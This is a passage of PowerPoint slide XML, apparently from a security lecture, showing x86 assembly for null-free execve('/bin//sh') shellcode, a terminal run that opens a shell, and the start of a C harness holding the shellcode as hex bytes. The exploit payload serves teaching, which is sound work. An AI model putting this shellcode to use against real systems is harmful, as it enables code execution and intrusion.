              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	# push n/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push 	$0x68732F6E	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	# push //bi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push	$0x69622F2F 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	push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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</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edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 	$11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%al	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(char* filename, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xor</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ebx</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ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	$0x80</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2974694" y="1258488"/>
            <a:ext cx="6269373" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> –m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>no_null_no_newline_shellcode.s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] $./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh-41.$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21605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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Testing the Shell Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600202"/>
            <a:ext cx="8229600" cy="4777450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B00040"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>= "\x31\xc0\x50\x68\x6e\x2f\x73\x68"	                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                   "\x68\x2f\x2f\x62\x69\x89\xe3\x50"	                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
